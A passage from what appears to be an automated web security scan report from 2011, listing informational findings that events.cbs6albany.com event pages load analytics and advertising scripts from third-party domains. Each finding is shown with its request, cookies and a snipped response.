Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 288
ETag: "e9d92501c809909f4f9073df47012e75"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:13 GMT; HttpOnly
Content-Length: 69370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.160. http://events.cbs6albany.com/albany-ny/events/show/151637365-riverdance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/151637365-riverdance

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/151637365-riverdance HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:14 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 169
ETag: "e2eb2b4905d1880158999453feff7c80"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:14 GMT; HttpOnly
Content-Length: 60444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.161. http://events.cbs6albany.com/albany-ny/events/show/152086945-harlem-globetrotters

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/152086945-harlem-globetrotters

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/152086945-harlem-globetrotters HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:17 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 360
ETag: "38bd9e5de09ad45e8a1cf768f5953a0e"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:17 GMT; HttpOnly
Content-Length: 47519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.162. http://events.cbs6albany.com/albany-ny/events/show/154912025-mike-epps-and-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/154912025-mike-epps-and-friends

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/154912025-mike-epps-and-friends HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 173
ETag: "c740a1825c985b49ed3597f2feda837d"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:15 GMT; HttpOnly
Content-Length: 59399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.163. http://events.cbs6albany.com/albany-ny/events/show/155222925-keith-urban-get-closer-2011-world-tour

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/155222925-keith-urban-get-closer-2011-world-tour

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/155222925-keith-urban-get-closer-2011-world-tour HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:16 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 204
ETag: "e8b0dacf547ea20331b1714856aca8d2"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:16 GMT; HttpOnly
Content-Length: 50228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.164. http://events.cbs6albany.com/albany-ny/events/show/155300665-celtic-woman

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/155300665-celtic-woman

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/155300665-celtic-woman HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 109
ETag: "9521f455c418d6da31578b0847f18a57"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:11 GMT; HttpOnly
Content-Length: 59374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.165. http://events.cbs6albany.com/albany-ny/events/show/161856385-a-very-special-acoustic-electric-evening-with-trey-anastasio-tab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/161856385-a-very-special-acoustic-electric-evening-with-trey-anastasio-tab

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/161856385-a-very-special-acoustic-electric-evening-with-trey-anastasio-tab HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 136
ETag: "ad2d22883a82e2b5a9d596e15b187e0f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:31 GMT; HttpOnly
Content-Length: 59757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.166. http://events.cbs6albany.com/albany-ny/events/show/162869785-a-conversation-with-steve-martin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/162869785-a-conversation-with-steve-martin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/162869785-a-conversation-with-steve-martin HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
